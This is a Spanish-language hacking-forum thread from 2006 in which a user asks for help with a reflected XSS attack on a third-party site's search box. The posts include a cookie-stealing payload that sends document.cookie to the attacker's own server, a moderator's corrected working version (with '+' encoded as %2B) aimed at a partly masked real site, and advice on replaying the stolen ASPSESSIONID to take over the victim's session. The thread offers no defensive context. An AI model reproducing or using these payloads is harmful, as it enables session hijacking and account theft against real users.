elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 10:10  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Duda con XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda con XSS  (Leído 1,850 veces)
rakax


Desconectado Desconectado

Mensajes: 331


http://raka.uni.cc


Ver Perfil WWW
Duda con XSS
« en: 3 Noviembre 2006, 02:13 »

Buenas.
Queria pedir una pequeña ayuda con un bug de tipo XSS que encontre en una pagina,se encuentra en un buscador de la misma,una vez que subi el codigo del archivo que crea el log de las cookies en mi servidor (cookies.php) hice la url maligna poniendo:
http://www.xxxxx.com/search.php?cuadrodelbuscador=<script>window.location='http://miservidor.com/cookies.php?cookie='+document.cookie;</script>&nombredelboton=;
Esto de mede de crear un log en el server cuando alguien entre a la url maligna,y es asi el log se crea pero se crea vacio,no sale nada.
Para saber si una pagina es vulnerable crea a ver leido que debias escribir <script>alert(document.cookie);</script>
y si te salia un cartel de alerta es k es vulnerable.
Alguien me podria ayudar?
Gracias  ;)
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Duda con XSS
« Respuesta #1 en: 3 Noviembre 2006, 02:37 »

usa:
http://www.xxxxx.com/search.php?cuadrodelbuscador=<script>window.location='http://miservidor.com/cookies.php?cookie='%2Bdocument.cookie;</script>&nombredelboton=;
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Duda con XSS
« Respuesta #2 en: 3 Noviembre 2006, 03:43 »

No se pueden poner datos de terceros.

http://????????????/buscar.asp?TxtFind="><script>window.location.href='http://raknis.freehostia.com/cookies.php?cookie='%2Bdocument.cookie;</script>&B1=;

Saludos!!
En línea

rakax


Desconectado Desconectado

Mensajes: 331


http://raka.uni.cc


Ver Perfil WWW
Re: Duda con XSS
« Respuesta #3 en: 3 Noviembre 2006, 04:05 »

Ya lo se pero es para ver si me puedes ayudar.
ya k a mi no me funciona y creo averlo hecho bien.
Perdon  :-(
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
rakax


Desconectado Desconectado

Mensajes: 331


http://raka.uni.cc


Ver Perfil WWW
Re: Duda con XSS
« Respuesta #4 en: 3 Noviembre 2006, 04:14 »

Gracias era el codigo que estaba mal  :P
Pero nada ahora nose muy bine lo que debo de hacer con lo de
ASPSESSIONIDQQTQABTB=xxxxxxxxxxxxxxxxxxxxxx
donde debo de meter estos valores? debo de arreglar mi cookie para logearme como este usuario? como lo hago o mejor donde encuentro esta info?
Gracias y no molesto mas  :P
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Duda con XSS
« Respuesta #5 en: 3 Noviembre 2006, 04:20 »

las debes meter como cookie.
investiga que son los ataques de XSS primero ;)

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines